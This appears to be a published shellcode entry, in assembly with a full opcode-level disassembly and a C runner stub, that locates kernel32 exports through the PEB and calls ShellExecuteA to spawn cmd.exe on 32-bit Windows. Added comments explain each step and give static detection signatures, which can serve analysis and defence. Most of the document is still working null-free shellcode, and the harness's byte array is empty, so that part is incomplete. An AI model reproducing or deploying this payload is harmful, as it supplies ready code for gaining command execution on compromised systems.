Windows x86 ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) Shellcode

Author: Roziul Hasan Khan Shifat Published: 2016-06-23 Verified: Verified



    # Title : Windows x86 ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) shellcode
    # Date : 22-06-2016
    # Author : Roziul Hasan Khan Shifat
    # Tested on : Windows 7,10 x86
;-----------------------------------------------------------------------
; Windows x86 (32-bit) position-independent shellcode, NASM / Intel syntax.
;
; What the code below does, in order:
;   1. PEB -> Ldr -> InMemoryOrderModuleList -> third entry -> kernel32 base
;   2. walks the kernel32 export table, string-comparing names until it
;      finds "GetProcAddre..." and derives the address of GetProcAddress
;   3. GetProcAddress(kernel32, "LoadLibraryA")
;   4. GetProcAddress(kernel32, "ExitProcess")
;   5. LoadLibraryA("shell32.dll")
;   6. GetProcAddress(shell32, "ShellExecuteA")
;   7. ShellExecuteA(NULL, NULL, "cmd.exe", NULL, NULL, 1)
;   8. ExitProcess(<garbage>)
; Every string is assembled on the stack from pushed immediates and the
; terminating zero is written with `mov [esp+n],cl` (cl = 0), so the
; encoding contains no 0x00 byte (see the objdump listing further down).
;
; Analyst / detection notes:
;   * The fs:[0x30] PEB read followed by the 0x0c/0x14/0x10/0x3c/0x78
;     offset chain is the classic export-directory walk; the dword
;     compares "GetP","rocA","ddre" and the pushed immediates spelling
;     "LoadLibraryA", "ExitProcess", "shell32.dll", "ShellExecuteA" and
;     "cmd.exe" are stable static signatures of this payload.
;   * Register roles: ebx = kernel32 base; esi = GetProcAddress (after the
;     lookup); edx = GetProcAddress, later LoadLibraryA; edi = kernel32
;     base, then LoadLibraryA, then ExitProcess; eax = last API return.
;   * `jnz Get_func` references a label that does not appear in this
;     listing; the disassembly below shows Get_func at the `inc ecx`
;     (0x401023). `_start` is declared global but no `_start:` line
;     survives here either — presumably both were lost in extraction.
;   * lodsd relies on DF = 0 (esi auto-increment); that is the normal
;     state at process entry but is an unstated assumption.
;-----------------------------------------------------------------------
section .text
    global _start
xor ecx,ecx ; ecx = 0; used as a zero base register so the next load has no 0x00 byte (64 8b 41 30)
mov eax,[fs:ecx+0x30] ; EAX = TEB->PEB (fs:[0x30])
mov eax,[eax+0xc] ; EAX = PEB->Ldr (PEB_LDR_DATA)
mov esi,[eax+0x14] ; ESI = Ldr->InMemoryOrderModuleList.Flink = first entry (the exe)
lodsd ; EAX = first->Flink = second entry (ntdll.dll)
xchg eax,esi ; ESI = second entry
lodsd ; EAX = second->Flink = third entry (kernel32.dll on the tested builds)
mov ebx,[eax+0x10] ; EBX = DllBase (at +0x10 from the InMemoryOrderLinks field) = kernel32 base
mov edx,[ebx+0x3c] ; EDX = IMAGE_DOS_HEADER.e_lfanew
add edx,ebx ; EDX = IMAGE_NT_HEADERS (PE header)
mov edx,[edx+0x78] ; EDX = DataDirectory[EXPORT].VirtualAddress (RVA)
add edx,ebx ; EDX = IMAGE_EXPORT_DIRECTORY
mov esi,[edx+0x20] ; ESI = AddressOfNames RVA
add esi,ebx ; ESI = AddressOfNames (array of name RVAs)
xor ecx,ecx ; name index, incremented before each read (so 1-based inside the loop)
inc ecx ; Get_func: (label missing from this listing, see header) — ecx = i+1 for name i
lodsd ; EAX = RVA of name[i]
add eax,ebx ; EAX = pointer to the exported name string
cmp dword [eax],0x50746547 ; "GetP" (little-endian); only the first 12 bytes of the name are checked
jnz Get_func
cmp dword [eax+0x4],0x41636f72 ; "rocA"
jnz Get_func
cmp dword [eax+0x8],0x65726464 ; "ddre" -> any export starting "GetProcAddre" matches; GetProcAddress is the expected hit
jnz Get_func
mov esi,[edx+0x24] ; ESI = AddressOfNameOrdinals RVA
add esi,ebx ; ESI = AddressOfNameOrdinals (WORD array)
mov cx,[esi+ecx*2] ; CX = ordinal; 16-bit load, upper half of ecx keeps the (zero) high half of the counter
                   ; NOTE(review): ecx is i+1 here (inc precedes lodsd), so this reads the ordinal
                   ; entry one past the matched name; the dec below then relies on that table being
                   ; consecutive around this point — verify on the target kernel32 build
dec ecx
mov esi,[edx+0x1c] ; ESI = AddressOfFunctions RVA
add esi,ebx ; ESI = AddressOfFunctions (array of function RVAs)
mov edx,[esi+ecx*4] ; EDX = function RVA (export directory pointer no longer needed)
add edx,ebx ; EDX = GetProcAddress
xor esi,esi ; redundant: the mov below fully overwrites esi
mov esi,edx ; ESI = GetProcAddress (kept here across all later calls)
xor edi,edi ; redundant: the mov below fully overwrites edi
mov edi,ebx ; EDI = kernel32 base (second copy for the ExitProcess lookup)
;finding address of LoadLibraryA()
xor ecx,ecx
push ecx ; terminating NUL dword
push 0x41797261 ; "aryA"
push 0x7262694c ; "Libr"
push 0x64616f4c ; "Load"  -> "LoadLibraryA\0" (16 bytes on stack)
push esp ; lpProcName
push ebx ; hModule = kernel32
call edx ; EAX = GetProcAddress(kernel32, "LoadLibraryA"); stdcall pops the 8 arg bytes
add esp,12 ; string used 16 bytes; 4 bytes are left on the stack (harmless, never popped back)
xor ecx,ecx
;finding address of ExitProcess
push 0x42737365 ; "essB"
mov [esp+3],cl ; -> "ess\0"
push 0x636f7250 ; "Proc"
push 0x74697845 ; "Exit" -> "ExitProcess\0" (12 bytes)
push esp ; lpProcName
push edi ; hModule = kernel32
xor edi,edi ; redundant: the mov below fully overwrites edi
mov edi,eax ; EDI = LoadLibraryA (saved before eax is clobbered by the call)
call esi ; EAX = GetProcAddress(kernel32, "ExitProcess")
add esp,12 ; drops the 12-byte string exactly
xor ecx,ecx
push ecx ; terminating NUL dword
push 0x416c6c64 ; "dllA"
mov [esp+3],cl ; -> "dll\0"
push 0x2e32336c ; "l32."
push 0x6c656873 ; "shel" -> "shell32.dll\0" (16 bytes)
push esp ; lpLibFileName
xor edx,edx ; redundant: the mov below fully overwrites edx
mov edx,edi ; EDX = LoadLibraryA
mov edi,eax ; EDI = ExitProcess
call edx ; EAX = LoadLibraryA("shell32.dll") = HMODULE of shell32
add esp,11 ; string used 16 bytes; esp is no longer dword-aligned from here until the add esp,13 below (11+13 = 24)
;finding address of ShellExecuteA()
xor ecx,ecx
push 0x42424241 ; "ABBB"
mov [esp+1],cl ; -> "A\0BB"
push 0x65747563 ; "cute"
push 0x6578456c ; "lExe"
push 0x6c656853 ; "Shel" -> "ShellExecuteA\0" (plus 2 pad bytes)
push esp ; lpProcName
push eax ; hModule = shell32
call esi ; EAX = GetProcAddress(shell32, "ShellExecuteA"); called with a misaligned esp (tolerated by x86, not ABI-clean)
add esp,13 ; restores dword alignment together with the earlier add esp,11
xor ecx,ecx
push 0x41657865 ; "exeA"
mov [esp+3],cl ; -> "exe\0"
push 0x2e646d63 ; "cmd." -> "cmd.exe\0"
push esp
pop ecx ; ECX = pointer to "cmd.exe"
xor edx,edx
inc edx ; EDX = 1
push edx ; nShowCmd = 1 (SW_SHOWNORMAL)
xor edx,edx
push edx ; lpDirectory = NULL
push edx ; lpParameters = NULL
push ecx ; lpFile = "cmd.exe"
push edx ; lpOperation = NULL
push edx ; hwnd = NULL
call eax ; ShellExecuteA(NULL, NULL, "cmd.exe", NULL, NULL, 1); stdcall pops the 24 arg bytes
call edi ; ExitProcess — no uExitCode is pushed; it reads whatever dword sits at [esp+4], here the first 4 bytes of "cmd.exe"
Disassembly of section .text:
00401000 <_start>:
  401000:   31 c9                   xor    %ecx,%ecx
  401002:   64 8b 41 30             mov    %fs:0x30(%ecx),%eax
  401006:   8b 40 0c                mov    0xc(%eax),%eax
  401009:   8b 70 14                mov    0x14(%eax),%esi
  40100c:   ad                      lods   %ds:(%esi),%eax
  40100d:   96                      xchg   %eax,%esi
  40100e:   ad                      lods   %ds:(%esi),%eax
  40100f:   8b 58 10                mov    0x10(%eax),%ebx
  401012:   8b 53 3c                mov    0x3c(%ebx),%edx
  401015:   01 da                   add    %ebx,%edx
  401017:   8b 52 78                mov    0x78(%edx),%edx
  40101a:   01 da                   add    %ebx,%edx
  40101c:   8b 72 20                mov    0x20(%edx),%esi
  40101f:   01 de                   add    %ebx,%esi
  401021:   31 c9                   xor    %ecx,%ecx
00401023 <Get_func>:
  401023:   41                      inc    %ecx
  401024:   ad                      lods   %ds:(%esi),%eax
  401025:   01 d8                   add    %ebx,%eax
  401027:   81 38 47 65 74 50       cmpl   $0x50746547,(%eax)
  40102d:   75 f4                   jne    401023 <Get_func>
  40102f:   81 78 04 72 6f 63 41    cmpl   $0x41636f72,0x4(%eax)
  401036:   75 eb                   jne    401023 <Get_func>
  401038:   81 78 08 64 64 72 65    cmpl   $0x65726464,0x8(%eax)
  40103f:   75 e2                   jne    401023 <Get_func>
  401041:   8b 72 24                mov    0x24(%edx),%esi
  401044:   01 de                   add    %ebx,%esi
  401046:   66 8b 0c 4e             mov    (%esi,%ecx,2),%cx
  40104a:   49                      dec    %ecx
  40104b:   8b 72 1c                mov    0x1c(%edx),%esi
  40104e:   01 de                   add    %ebx,%esi
  401050:   8b 14 8e                mov    (%esi,%ecx,4),%edx
  401053:   01 da                   add    %ebx,%edx
  401055:   31 f6                   xor    %esi,%esi
  401057:   89 d6                   mov    %edx,%esi
  401059:   31 ff                   xor    %edi,%edi
  40105b:   89 df                   mov    %ebx,%edi
  40105d:   31 c9                   xor    %ecx,%ecx
  40105f:   51                      push   %ecx
  401060:   68 61 72 79 41          push   $0x41797261
  401065:   68 4c 69 62 72          push   $0x7262694c
  40106a:   68 4c 6f 61 64          push   $0x64616f4c
  40106f:   54                      push   %esp
  401070:   53                      push   %ebx
  401071:   ff d2                   call   *%edx
  401073:   83 c4 0c                add    $0xc,%esp
  401076:   31 c9                   xor    %ecx,%ecx
  401078:   68 65 73 73 42          push   $0x42737365
  40107d:   88 4c 24 03             mov    %cl,0x3(%esp)
  401081:   68 50 72 6f 63          push   $0x636f7250
  401086:   68 45 78 69 74          push   $0x74697845
  40108b:   54                      push   %esp
  40108c:   57                      push   %edi
  40108d:   31 ff                   xor    %edi,%edi
  40108f:   89 c7                   mov    %eax,%edi
  401091:   ff d6                   call   *%esi
  401093:   83 c4 0c                add    $0xc,%esp
  401096:   31 c9                   xor    %ecx,%ecx
  401098:   51                      push   %ecx
  401099:   68 64 6c 6c 41          push   $0x416c6c64
  40109e:   88 4c 24 03             mov    %cl,0x3(%esp)
  4010a2:   68 6c 33 32 2e          push   $0x2e32336c
  4010a7:   68 73 68 65 6c          push   $0x6c656873
  4010ac:   54                      push   %esp
  4010ad:   31 d2                   xor    %edx,%edx
  4010af:   89 fa                   mov    %edi,%edx
  4010b1:   89 c7                   mov    %eax,%edi
  4010b3:   ff d2                   call   *%edx
  4010b5:   83 c4 0b                add    $0xb,%esp
  4010b8:   31 c9                   xor    %ecx,%ecx
  4010ba:   68 41 42 42 42          push   $0x42424241
  4010bf:   88 4c 24 01             mov    %cl,0x1(%esp)
  4010c3:   68 63 75 74 65          push   $0x65747563
  4010c8:   68 6c 45 78 65          push   $0x6578456c
  4010cd:   68 53 68 65 6c          push   $0x6c656853
  4010d2:   54                      push   %esp
  4010d3:   50                      push   %eax
  4010d4:   ff d6                   call   *%esi
  4010d6:   83 c4 0d                add    $0xd,%esp
  4010d9:   31 c9                   xor    %ecx,%ecx
  4010db:   68 65 78 65 41          push   $0x41657865
  4010e0:   88 4c 24 03             mov    %cl,0x3(%esp)
  4010e4:   68 63 6d 64 2e          push   $0x2e646d63
  4010e9:   54                      push   %esp
  4010ea:   59                      pop    %ecx
  4010eb:   31 d2                   xor    %edx,%edx
  4010ed:   42                      inc    %edx
  4010ee:   52                      push   %edx
  4010ef:   31 d2                   xor    %edx,%edx
  4010f1:   52                      push   %edx
  4010f2:   52                      push   %edx
  4010f3:   51                      push   %ecx
  4010f4:   52                      push   %edx
  4010f5:   52                      push   %edx
  4010f6:   ff d0                   call   *%eax
  4010f8:   ff d7                   call   *%edi
char shellcode[]=\
printf("shellcode length %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();